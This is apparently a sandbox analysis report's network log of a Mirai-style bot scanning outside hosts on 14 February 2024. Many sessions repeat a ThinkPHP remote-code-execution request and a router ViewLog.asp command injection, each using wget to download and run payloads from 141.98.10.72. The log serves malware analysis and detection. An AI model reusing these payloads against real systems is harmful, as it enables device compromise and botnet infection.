                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            718192.168.2.2342918112.105.29.8980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:36.072494030 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:36.406877041 CET872INData Raw: 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 76 61 72 73 5b 31 5d 5b 5d 3d
                                                            Data Ascii: hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 404 Not FoundServer: xhmmhttpsv130-202003


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            719192.168.2.2341044112.74.44.16680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:36.083467007 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:36.425558090 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Wed, 14 Feb 2024 08:29:36 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            720192.168.2.2338992112.222.171.13380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:36.387881994 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:36.694550991 CET115INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/plain; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                            Data Ascii: 400 Bad Request


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            721192.168.2.2354870112.125.25.23380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:36.445226908 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:36.827923059 CET337INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.10.2
                                                            Date: Wed, 14 Feb 2024 08:29:36 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 173
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.2</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            722192.168.2.234080288.208.229.1280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:38.017968893 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:38.218739033 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Wed, 14 Feb 2024 08:29:39 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            723192.168.2.2343390113.125.65.7123
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:38.032439947 CET179INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 38 3a 32 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:28:21Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            724192.168.2.235706288.26.248.10380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:38.044744968 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            725192.168.2.235059894.121.123.1008080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:38.093261957 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            726192.168.2.233381685.202.8.908080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:38.106458902 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:38.367122889 CET487INHTTP/1.1 404 Not Found
                                                            Date: Wed, 14 Feb 2024 08:29:38 GMT
                                                            Server: Apache/2.2.15 (CentOS)
                                                            Content-Length: 295
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at 192.168.0.14 Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            727192.168.2.233766631.136.222.1698080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:38.296372890 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:38.933527946 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:40.181332111 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:42.837157011 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:47.956242085 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:57.938930035 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:19.439934969 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:31:00.394279003 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            728192.168.2.235877894.121.45.808080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:38.341069937 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            729192.168.2.235140294.121.61.2258080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:38.341125965 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            730192.168.2.2343416113.125.65.7123
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:38.763983965 CET179INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 38 3a 32 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:28:22Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            731192.168.2.234124631.136.139.2218080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:39.041367054 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:42.069156885 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:48.212218046 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
